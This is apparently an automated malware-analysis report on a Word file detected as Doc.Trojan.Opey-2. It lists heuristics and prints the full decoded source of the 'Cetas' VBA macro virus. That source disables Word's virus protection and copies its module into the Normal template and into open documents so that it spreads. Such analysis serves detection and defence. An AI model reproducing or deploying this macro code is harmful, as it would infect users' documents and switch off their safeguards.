MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a legacy WordBasic AutoClose macro that attempts to export and import VBA components, specifically targeting the 'xHeCs11' module and saving it as 'c:\MsWin.sys'. This behavior is indicative of a macro-based malware, likely a virus, attempting to establish itself or spread. The ClamAV detection further supports the malicious nature of the file.
Heuristics 4
-
ClamAV: Doc.Trojan.Opey-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Opey-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2244 bytes |
SHA-256: 02b2e658b05710d0e40dae1b135170eaa523aaf3cd88d9dd71d778be3e48d770 |
|||
|
Detection
ClamAV:
Doc.Trojan.Opey-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "xHeCs11"
Sub AutoClose()
Attribute AutoClose.VB_Description = "Macro created 09-15-99 by xHeCs\r\n\r\n"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.xHeCs1.AutoClose"
'
' Cetas Virus version 1.1 by xHeCs
' ATTENTION LAMERS that's you !!!.
' You can learn a lot from this virus, But Please respect
' What is not yours.
'
SaveVPSet = Application.Options.VirusProtection
Application.Options.VirusProtection = False
On Error Resume Next
If Activation = 12 Or Activation = 23 Or Activation = 4 Then Copyright
Application.VBE.ActiveVBProject.VBComponents("xHeCs11").Export "c:\MsWin.sys"
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "xHeCs11" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "xHeCs11" Then ActivInstall = True
Next I
If ActivInstall = True And NormInstall = False Then Set Target = NormalTemplate.VBProject _
Else: If ActivInstall = False And NormInstall = True Then Set Target = ActiveDocument.VBProject
Target.VBComponents.Import ("c:\MsWin.sys")
If Year(Now()) = 2000 Then Copyright
Application.Options.VirusProtection = SaveVPSet
End Sub
Function Activation()
Activation = Day(Now())
End Function
Function Copyright()
If Minute(Now()) = 23 Then
MsgBox " Cetas Virus version 1.1 by xHeCs ", vbCritical
Selection.TypeParagraph
Selection.TypeParagraph
Selection.TypeText Text:="Cetas Virus version 1.1"
Selection.TypeParagraph
Selection.TypeText Text:=" (C) Copyright xHeCS 1999-2000"
Selection.TypeParagraph
Selection.TypeParagraph
Selection.TypeText Text:=" Life is like a box of chocolate"
Selection.TypeParagraph
Selection.TypeText Text:="You'll never know what your gonna get"
Selection.TypeParagraph
Selection.TypeParagraph
End If
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.